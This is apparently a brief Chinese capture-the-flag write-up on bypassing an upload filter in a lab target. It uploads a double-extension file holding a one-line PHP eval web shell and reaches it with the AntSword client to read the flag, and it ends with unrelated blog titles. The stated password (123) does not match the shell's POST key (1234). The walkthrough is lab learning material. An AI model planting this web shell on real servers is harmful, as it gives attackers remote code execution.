题目
1.打开靶机
随便上传一个图片,查看get请求发现**/upload/XXX.jpg**
2.创建一个脚本文件
命名为flag.php.jpg,并上传
脚本文件内容:
<?php @eval($_POST[1234])?>
3上传后复制文件get请求的链接并打开蚁剑
连接密码为123
双击链接
4,查找'/'在最下面找到flag文件
5,打开文件得到flag
相关推荐
TechWayfarer7 小时前
账号安全实战:基于IP归属地基线的三原则异地登录风控模型2301_7807896610 小时前
多层级 CC 防护体系:前端验证与后端限流的协同配置实践梧六柒10 小时前
6-大小写绕过X7x511 小时前
终端安全管理(ESM):企业安全的“数字神经中枢“梧六柒21 小时前
5-.点+空格+点绕过 || .user.ini绕过pencek1 天前
HakcMyVM-SlackwareX7x51 天前
终端防护平台(EPP):企业安全的“数字护城河“汤愈韬1 天前
防火墙主备备份的非VRRP的三种模式Chockmans1 天前
春秋云境CVE-2022-32991(手注和sqlmap)保姆级教学云安全助手1 天前
中小企业上云指南:如何用云服务器搭建安全稳定的办公系统